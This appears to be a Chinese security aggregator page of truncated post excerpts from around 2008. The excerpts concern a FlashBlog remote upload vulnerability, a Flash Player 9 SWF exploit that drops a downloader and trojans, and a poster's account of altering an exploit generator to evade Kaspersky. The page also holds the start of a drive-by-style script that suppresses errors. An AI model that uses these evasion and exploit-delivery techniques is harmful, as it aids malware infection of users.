来自 ： < mefisto_at_hackermail.com >
日期 ： 2008年5月29日6时57分21秒-0000
（ '二元'的编码是不支持，存储为-是） flashblog beta0.31远程文件上传漏洞

# Author : MEFISTO ---- mefisto |at |hackermail |dot| com ＃作者： mefisto ----

[阅读全文]

作者：open
首先说下。偶么有看其它的版本。我只对我中招后所提出来的版本为例。
其它版本我一无所知。
看留言有位仁兄提出时间问题。是的。这个版本却实有个时间验证问题。
不过改一个字节足可以跳过它的验证。
还有偶对SWF格式或FLASH完全不熟。
我从来不当它是一个SWF来反编译来。
下面是我改过的生成器。去掉时间验证，同时把SHELLCODE向后推了两个字节。卡巴应该不会再叫。

其实杀软不清楚，

[阅读全文]

<script>
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1){
var expires=new Date();
exp

[阅读全文]

新闻来源:cbmland.com
今天取到了一份swf格式的exploits，测试了一下在Flash Player 9 .0.115的结果。
Adobe Flash Player 9 .0.115 在播放恶意构造的swf时，会自动下载一个可执行文件并执行，而我拿到的这个swf文件会自动下载一个downloader并运行，然后再由这个downloader下载其他预先指定的木马程序，相当的危险。

这个漏

[阅读全文]